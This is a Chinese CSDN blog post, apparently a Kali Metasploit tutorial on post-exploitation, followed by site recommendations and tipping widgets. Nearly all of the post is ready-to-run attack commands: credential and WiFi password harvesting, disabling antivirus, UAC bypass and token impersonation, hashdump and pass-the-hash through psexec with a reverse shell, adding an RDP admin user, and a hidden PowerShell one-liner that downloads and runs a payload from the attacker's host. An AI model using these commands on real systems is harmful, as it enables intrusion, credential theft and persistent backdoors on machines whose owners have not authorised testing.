【kali-漏洞利用】(3.3)Metasploit后渗透(下):后渗透模块使用

最新推荐文章于 2024-05-29 19:16:08 发布
最新推荐文章于 2024-05-29 19:16:08 发布
阅读量652 收藏 8
点赞数 1
分类专栏: 0X03【kali渗透】 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126186008
版权

目录

一、推荐

二、使用

2.1、网络命令

Socks代理

2.2、信息收集

常用:

2.3、提权

本地提权:

绕过UAC提权

RunAs提权

假冒令牌提权

2.4、窃取hash及密码

hashdump

哈希传递

2.5、RDP

开启3389

远程桌面

2.6、后门植入

Powershell后门

一、推荐

【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/126179710?spm=1001.2014.3001.5501

二、使用

2.1、网络命令

Socks代理

前提:在目标设备添加完路由,才可以通过msf带的socks4a模块进行socks4代理转发
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 2000
run

vim /etc/proxychains.conf   #在文件末尾添加socks4代理服务器

使用proxychains代理访问执行nmap操作

proxychains nmap -sV -p 445 --script=smb-vuln-ms17-010.nse IP  
    #扫描永恒之蓝漏洞
proxychains hydra IP rdp -l administrator -P password.txt -V   
    #rdp服务暴力破解

2.2、信息收集

常用:

run arp_scanner -r ip/24  #利用arp进行存活主机扫描
run winenum               #自动化执行一些检测脚本
run credcollect           #获取用户hash
run domain_list_gen         #获取域管理账户列表
run post/multi/gather/env   #获取用户环境变量
run post/windows/gather/enum_logged_on_users -c  #列出当前登录用户
run post/linux/gather/checkvm     #是否虚拟机
run post/windows/gather/checkvm   #是否虚拟机
run post/windows/gather/forensics/enum_drives  #查看磁盘分区信息
run post/windows/gather/enum_applications      #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近访问过的文档、链接信息
run post/windows/gather/enum_ie     #获取IE缓存
run post/windows/gather/enum_firefox  #获取firefox缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/multi/recon/local_exploit_suggester  #获取本地提权漏洞
run post/windows/gather/enum_patches  #获取补丁信息
run post/windows/gather/enum_domain   #查找域控
run post/windows/gather/enum_snmp     #获取snmp团体名称
run post/windows/gather/credentials/vnc  #获取vnc密码
run post/windows/wlan/wlan_profile       #用于读取目标主机WiFi密码
run post/multi/gather/wlan_geolocate     #基于wlan进行地理位置确认 文件位于/root/.msf4/loot
run post/windows/manage/killav           #关闭杀毒软件

2.3、提权

本地提权:

搜集补丁信息,寻找可利用exploits提权

run post/windows/gather/enum_patches  #查看补丁信息
background
search MS10-015
use exploit/windows/local/ms10_015_kitrap0d
set session 8
run

绕过UAC提权

msf内置bypassuac脚本,原理不同,使用方法类似

执行后返回一个新的会话,再次执行getsystem即可提权

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_injection_winsxs
exploit/windows/local/bypassuac_silentcleanup
exploit/windows/local/bypassuac_vbs

命令getsystem提权失败,再利用bypassuac来提权

例如exploit/windows/local/bypassuac模块(32位、64位都有效)

use exploit/windows/local/bypassuac
set session 1
run

RunAs提权

利用exploit/windows/local/ask模块(32、64位),创建一个可执行文件并在目标机上发起一个提升权限请求的程序,触发系统UAC,提示用户是否进行更改,若选择“是”,拿到高权限的meterpreter shell

use exploit/windows/local/ask
set filename update.exe  # 设置反弹程序名称
set session 1
run

前提:

系统当前用户须在管理员组或者知道管理员的密码

用户账户控制程序UAC设置则没有要求

会创建一个可执行文件,该可执行文件(需进行免杀处理)的创建要使用EXE::Custom选项

假冒令牌提权

令牌是系统临时密钥,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源。这些令牌将持续存在于系统中,除非系统重新启动。

两种类型的令牌:

一种是Delegation Tokens(授权令牌),支持交互式登录(eg:远程桌面登陆登录)

一种是Impersonation Tokens(模拟令牌),非交互的会话(eg:访问文件共享)

use incognito     #加载窃取令牌模块 
list_tokens -u    #查看可用的用户令牌
list_tokens -g    #查看可用的用户组令牌
impersonate_token 'NT AUTHORITY\SYSTEM'  #假冒SYSTEM token
rev2self          #返回原始token

2.4、窃取hash及密码

hashdump

hashdump
run post/windows/gather/smart_hashdump

#得到的hash解密即用户密码

哈希传递

利用hashdump得到用户的hash

再利用psexec模块进行哈希传递攻击
使用psexec的前提:SMB服务必须开启(开启445端口);Admin$可以访问

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.183.147
set LPORT 443
set RHOST 192.168.183.154
set SMBUSER Administrator
set SMBPASS ccf**4ee:3db**678
set SMBDOMAIN  WORKGROUP   # 域用户需要设置SMBDOMAIN
run

2.5、RDP

开启3389

通过enable_rdp脚本将用户添加到远程桌面用户组和管理员用户组

run post/windows/manage/enable_rdp   #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6667       #将3389端口转发到6667

远程桌面

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
setdesktop    #设置meterpreter关联的桌面  -h查看帮助
run vnc       #使用vnc远程桌面连接
rdesktop 127.0.0.1:1111   #需要输入用户名密码连接
rdesktop -u Administrator -p 123 127.0.0.1:1111  #-u 用户名 -p 密码

2.6、后门植入

Powershell后门

use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.183.147
set LPORT 2334
set srvport 2333
set uripath /
set target 5
run

在目标设备cmd上执行以下命令即可反弹
powershell.exe -nop -w hidden -c $z="echo ($env:temp+'\eJedcsJE.exe')"; (new-object System.Net.WebClient).DownloadFile('http://192.168.183.147:2333/', $z); invoke-item $z

(注:命令来源于网络)

黑色地带(崛起)
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透之查看补丁安装情况
不忘初心,护天下安全!
06-02 395
通过查看补丁安装情况,发现操作系统可能存在的安全缺陷。查看安装的软件及版本和路径:查看系统补丁安装情况:
[系统安全] 三十八.Metasploit渗透技术信息收集、权限提权和功能模块详解
杨秀璋的专栏
01-17 5808
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。这篇文章继续带领大家深入Metasploit技术,涉及后渗透相关的技术,包括信息收集、权限提权、移植漏洞模块和后门。同时,结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有所帮助~
49-49.渗透测试-Kali Linux漏洞扫描.mp4
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
vsftp3.0.4适用于el7(centos7.x),规避3.0.2版本的漏洞
03-01
1) 上传包到服务器安装路径 vsftpd-v3.0.4-centos7.zip 2) 解压: unzip vsftpd-v3.0.4-centos7.zip 3) 备份配置文件: cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.bak 4) 如果运行了vsftpd,则先停止: systemctl stop vsftpd 5) 安装升级vsftpd 3.0.4 rpm -Uvh vsftpd-3.0.4-1.el7.x86_64.rpm rpm -Uvh vsftpd-sysvinit-3.0.4-1.el7.x86_64.rpm 6) 启动vsftpd: systemctl start vsftpd 7) 验证版本信息: vsftpd –v 8) 验证服务可用 使用SSH工具,可以使用ftp协议访问 或者在文件中,外部系统正常的往系统内写入文件
安装kali-2021版本渗透测试系统-课程资料.rar
06-09
安装kali-2021版本渗透测试系统-课程资料 含kali镜像BT种子
vsftpd-3.0.3.zip
05-14
最近XX公司对我们服务器进行漏洞扫描发现vsftp存在漏洞, 因此需要到vsftpd官网去下载源码编译安装,好不容易才拿到,和大家分享。 附件包括PGP签名文件。 vsftpd-3.0.3.tar.gz SHA256 :9d4d2bf6e6e2884852ba4e69e157a2cecd68c5a7635d66a3a8cf8d898c955ef7 vsftpd-3.0.3.tar.gz.asc SHA256 :8250f7e249c3b298760ce0308fb1fefccbd1a9aed4c30f9e75276c09e5164118
使用kali-linux将Metasploit Framework接入互联网的使用教程
12-29
使用kali-linux将Metasploit Framework接入互联网的使用教程
frp内网穿透—将kali代理在公网中进行渗透测试
monster663的博客
09-10 5624
frp内网穿透,通过frp将kali虚拟机端口映射到公网IP端口上,更好的解决利用kali对公网IP展开测试的问题
nginx CVE -2013-2028 漏洞分析
weixin_38371073的博客
04-28 4325
参考: Nginx栈溢出分析 - CVE-2013-2028 - l3m0n - 博客园 (cnblogs.com) 0. 背景 操作系统:ubuntu 18.04 64bit 漏洞软件:nginx-1.4.0 1. 漏洞补丁信息 从补丁可以认识一个漏洞的触发源。 查看github中的补丁信息Fixed chunk size parsing. · nginx/nginx@818807d (github.com)如下: if (ctx->size < 0 || ctx->l.
kali linux对Metasploitable2漏洞利用,vnc爆力破解 笔记
边城浪子的博客
09-20 1989
VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。可视化控制,类似于远程桌面,默认vnc服务端运行在5900端口 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 ...
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用kali-linux-2021.3-installer-amd64.part5.rar https://download.csdn.net/download/weixin_43800734/25872729 kali-linux-2021.3-installer-amd64.part4.rar https://download.csdn.net/download/weixin_43800734/25872820 kali-linux-2021.3-installer-amd64.part3.rar https://download.csdn.net/download/weixin_43800734/25872795 kali-linux-2021.3-installer-amd64.part2.rar https://download.csdn.net/download/weixin_43800734/25872637 kali-linux-2021.3-installer-amd64.part1.rar https://download.csdn.net/download/weixin_43800734/25872106 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
Linux解决CVE-2011-0762漏洞vsftpd升级步骤
热门推荐
lixinfu1980的博客
05-23 1万+
Linux解决CVE-2011-0762漏洞vsftpd升级步骤操作系统版本:RHEL 6.8 64位vsftpd 升级到3.0.3关闭服务 service vsftpd stop service iptables stop sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config; 检查旧版vsftpd 版本 vsft...
ubuntu 16.04 配置vsftp3.03 报错
sinat_36355775的博客
09-10 159
500 OOPS: vsftpd: refusing to run with writable root inside chroot () vsftpd.conf 添加 allow_writeable_chroot=YES
修复VSFTPD漏洞——版本升级
ᠰᡝᠪᠵᡝᠨ的博客
12-26 3767
文章目录第一步:备份相关文件第二步:编译安装新版本的VSFTPD第三步:将编译完成后的文件拷贝到该去的地方第四步:修改service文件其它:配置文件主要配置升级过程中遇到的问题完整地service文件 第一步:备份相关文件 mkdir vsftpd-bak #创建目录,用来做配置文件备份 cd vsftpd-bak/ cp -R /etc/vsftpd ./vsftpdbak`date +%F-%T` #备份全部的配置文件 cp /etc/rc.d/init.d/vsftpd ./vsftpd.ser
kali linux渗透测试技术详解综合笔记1
世界那么大,我要学编程看看!
06-11 2846
kali linux渗透测试技术详解综合笔记1
Windows下的本地提权漏洞梳理及后渗透简析
Alexz__的博客
06-09 964
1.github网址,截图,不同系统版本对应的漏洞 2.后渗透阶段 壹 通过1day漏洞进行Windows本地提权 分享一个github链接:Windows提权漏洞整理 里面大部分是基于x64系统的漏洞直接利用程序exe,傻瓜式操作,一键提权 C:\Users\Knownsec.zyg> C:\Users\Knownsec.zyg>xxxx.exe "whoami" C:\Users\Knownsec.zyg> 粘一个大佬分享的截图: 提权前若是能够查看该系统...
Kali Linux与无线网络渗透技术深度解析
qq_45058947的博客
07-30 403
无线网络渗透测试是网络安全领域中一种重要的安全评估方式,主要通过模拟黑客攻击来发现无线网络的潜在漏洞。其目的是识别、测试和加固无线网络中的安全漏洞,以防止真正的黑客攻击。Kali Linux是一款开源的Linux发行版,被广泛用于网络安全和渗透测试。它预装了600多种安全测试工具,如Wireshark、Aircrack-ng等,使其成为安全专家和网络管理员的首选工具。Kali Linux及其内置的无线网络渗透测试工具为我们提供了有效的网络安全评估手段。
语音控制系统的安全挑战与防御策略(下)
最新发布
声纹感知 洞察芯声
05-29 1000
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前提是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
利用Metasploit的永恒之蓝漏洞渗透win10
05-02
使用Metasploit渗透测试工具之前,需要先了解一些基础知识。永恒之蓝漏洞是一个远程代码执行漏洞,它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。...建议只在合法授权的情况下使用Metasploit进行渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值